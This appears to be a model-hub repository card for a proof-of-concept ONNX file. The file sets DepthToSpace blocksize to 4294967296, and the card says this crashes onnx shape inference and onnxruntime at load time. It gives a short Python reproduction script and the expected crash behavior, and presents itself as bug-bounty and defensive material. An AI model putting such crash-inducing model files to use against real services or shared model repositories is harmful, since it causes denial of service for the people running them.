ONNX DepthToSpace blocksize overflow PoC

This repository contains a benign security research PoC for an ONNX model that triggers a process-level crash in onnx.shape_inference and onnxruntime during model loading / shape inference.

Files:

  • depthtospace-blocksize-overflow.onnx

The model uses:

  • operator: DepthToSpace
  • attribute: blocksize = 4294967296
  • input shape: [1, 2, 1, 1]

Reproduction

python3 -m pip install onnx onnxruntime
python3 - <<'PY'
import onnx
import onnxruntime as ort

model = "depthtospace-blocksize-overflow.onnx"
onnx.checker.check_model(model)
print("checker ok")
onnx.shape_inference.infer_shapes_path(model)
print("unreachable if the issue reproduces")
PY

Expected behavior on the vulnerable environment:

  • onnx.checker.check_model(...) succeeds
  • onnx.shape_inference crashes the process
  • onnxruntime.InferenceSession(model) crashes the process during load

This PoC is intended for defensive validation and bug bounty reproduction only.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support